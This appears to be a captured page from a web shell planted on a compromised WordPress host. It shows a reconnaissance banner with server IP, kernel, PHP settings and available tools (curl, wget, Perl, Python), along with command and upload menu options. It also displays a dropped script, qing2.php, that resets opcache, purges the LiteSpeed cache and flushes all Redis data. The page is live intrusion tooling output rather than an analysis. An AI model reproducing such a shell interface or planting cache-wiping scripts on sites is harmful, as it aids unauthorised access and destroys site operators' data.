Server IP : 10.123.20.5  /  Your IP : 216.73.216.53
Web Server : Apache
System : Linux webm005.cluster123.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : wqgepnx ( 163969)
PHP Version : 8.2.29
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/wqgepnx/www/wp-includes/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/wqgepnx/www/wp-includes/../qing2.php
<?php 

if(function_exists("opcache_reset")){
	opcache_reset();
	echo "opcache_reset ok<br>\n";
}

header("X-LiteSpeed-Purge: *");


if (extension_loaded('redis')) {
   $redis = new Redis();
	$redis->connect('127.0.0.1', 6379);
	 
	$redis->flushAll();
	echo "Redis ok<br>\n";
}



?>